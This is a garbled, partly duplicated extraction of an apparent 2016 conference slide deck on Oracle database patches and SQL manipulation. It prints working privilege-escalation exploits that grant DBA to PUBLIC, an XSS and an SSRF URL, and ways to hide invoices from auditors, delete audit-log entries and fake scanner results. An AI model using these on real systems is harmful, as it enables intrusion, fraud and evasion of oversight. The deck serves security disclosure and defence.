July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Agenda
iexcl Intro
iexcl January 2016 - November 2016
iexcl Outlook 2017
iexcl QampA
Introduction
What will be shown in the next 45 minutes
iexcl Oracle Security Patches
iexcl Modify SQL statements amp Application Logic
iexcl Outlook 2017
Oracle Patches
Database Vulnerabilities and CPU
Patch situation is getting better but Oracle 12c
offers a large new playground (=tons of new
features) for security researchers
Problem Just a few people are doing security
research in the database
Nearly 50 of the database vulnerabilities were
foundreported by 2 researchers (David
Litchfield amp Alexander Kornbrust)
Oracle Vulnerabilities 2016
Oracle Vulnerabilities 2016
Number of vulnerabilities in Oracle database increasing again
iexcl 30 findings in 2016 (2015 29 2014 43 2013 13 2012 17)
iexcl 8 remote exploitable bugs (20153 2014 4 2013 7 2012 8 )
bull January 2016 CPU (7 Vulnerabilities ndash 0 remote)
bull April 2016 CPU (5 Vulnerabilities ndash 2 remote)
bull July 2016 CPU (9 Vulnerabilities ndash 5 remote)
bull October 2016 CPU (9 Vulnerabilities ndash 1 remote)
2016
January 2016
Oracle CPU January 2016
Exploiting the Oracle Workspace Manager SQL
Race Condition (David Litchfield)
DB Database Assessment Tool
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html httpwwwdavidlitchfieldcomExploitingtheOracleWorkspaceManagerSQLRaceConditionpdf httpsgithubcomfoospidyDbDat
January 2016 CPU
7 security fixes (No remote exploitable)
1 Java VM (CVSS 90)
1 Workspace Manager (CVSS 65)
2 XML Database (CVSS 55 40)
1 Database Vault (CVSS 40)
1 Security (CVSS 40)
1 XML Developerrsquos Kit (CVSS 40)
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html
Jan 2016 CPU- CVE-2016-0467
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Oracle native auditing fails to capture
bdquoCreate Java Sourceldquo
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
Jan 2016 CPU- CVE-2015-4921
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Status is incorrectly reported if SYS
Auditing is used together with DB Vault
Reporter David Litchfield
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Introduction
What will be shown in the next 45 minutes
iexcl Oracle Security Patches
iexcl Modify SQL statements amp Application Logic
iexcl Outlook 2017
Oracle Patches
Database Vulnerabilities and CPU
Patch situation is getting better but Oracle 12c
offers a large new playground (=tons of new
features) for security researchers
Problem Just a few people are doing security
research in the database
Nearly 50 of the database vulnerabilities were
foundreported by 2 researchers (David
Litchfield amp Alexander Kornbrust)
Oracle Vulnerabilities 2016
Oracle Vulnerabilities 2016
Number of vulnerabilities in Oracle database increasing again
iexcl 30 findings in 2016 (2015 29 2014 43 2013 13 2012 17)
iexcl 8 remote exploitable bugs (20153 2014 4 2013 7 2012 8 )
bull January 2016 CPU (7 Vulnerabilities ndash 0 remote)
bull April 2016 CPU (5 Vulnerabilities ndash 2 remote)
bull July 2016 CPU (9 Vulnerabilities ndash 5 remote)
bull October 2016 CPU (9 Vulnerabilities ndash 1 remote)
2016
January 2016
Oracle CPU January 2016
Exploiting the Oracle Workspace Manager SQL
Race Condition (David Litchfield)
DB Database Assessment Tool
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html httpwwwdavidlitchfieldcomExploitingtheOracleWorkspaceManagerSQLRaceConditionpdf httpsgithubcomfoospidyDbDat
January 2016 CPU
7 security fixes (No remote exploitable)
1 Java VM (CVSS 90)
1 Workspace Manager (CVSS 65)
2 XML Database (CVSS 55 40)
1 Database Vault (CVSS 40)
1 Security (CVSS 40)
1 XML Developerrsquos Kit (CVSS 40)
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html
Jan 2016 CPU- CVE-2016-0467
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Oracle native auditing fails to capture
bdquoCreate Java Sourceldquo
Reporter David Litchfield
